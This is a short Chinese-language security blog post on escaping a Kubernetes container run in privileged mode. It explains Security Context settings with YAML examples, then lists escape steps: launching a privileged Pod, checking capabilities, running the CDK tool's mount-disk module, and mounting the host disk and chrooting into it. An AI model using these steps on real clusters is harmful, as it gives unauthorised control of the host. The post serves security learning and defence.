集群安全之Privileged特权模式逃逸
集群安全之Privileged特权模式逃逸
Al1ex
发布于 2023-10-28 12:35:10
发布于 2023-10-28 12:35:10
代码可运行
运行总次数:0
代码可运行
文章前言
当容器启动加上--privileged选项时,容器可以访问宿主机上所有设备,而K8s配置文件如果启用了"privileged: true"也可以实现挂载操作
前置知识
Security Context(安全上下文),用于定义Pod或Container的权限和访问控制,Kubernetes提供了三种配置Security Context的方法:
- Pod Security Policy:应用于集群级别
- Pod-level Security Context:应用于Pod级别
- Container-level Security Context:应用于容器级别
容器级别:仅应用到指定的容器上,并且不会影响Volume
apiVersion: v1
kind: Pod
metadata:
name: hello-world
spec:
containers:
- name: hello-world-container
image: ubuntu:latest
securityContext:
privileged: truePod级别:应用到Pod内所有容器,会影响Volume
apiVersion: v1
kind: Pod
metadata:
name: hello-world
spec:
containers:
securityContext:
fsGroup: 1234
supplementalGroups: [5678]
seLinuxOptions:
level: "s0:c123,c456"PSP,集群级别:PSP是集群级的Pod安全策略,自动为集群内的Pod和Volume设置Security Context
具体实现
Step 1:使用docker拉取ubuntu镜像到本地
sudo docker pull ubuntu
Step 2:创建一个Pod
apiVersion: v1
kind: Pod
metadata:
name: myapp-test
spec:
containers:
- image: ubuntu:latest
name: ubuntu
securityContext:
privileged: true
Step 2:创建Pod
kubectl create -f myapp-test.yaml
Step 3:进入Pod进行逃逸操作
#进入pod
kubectl exec -it myapp-test /bin/bash
#查看磁盘
fdisk -l
Step 4:查看权限
cat /proc/self/status | grep CapEff
Step 5:使用CDK进行逃逸
./cdk run mount-disk
在容器内部进入挂载目录,直接管理宿主机磁盘文件(多少有一些问题)
Step 6:手动操作又存在以下问题:
mkdir /tmp/test
mount /dev/sda3 /tmp/test
chroot /tmp/test bash
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-10-27,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
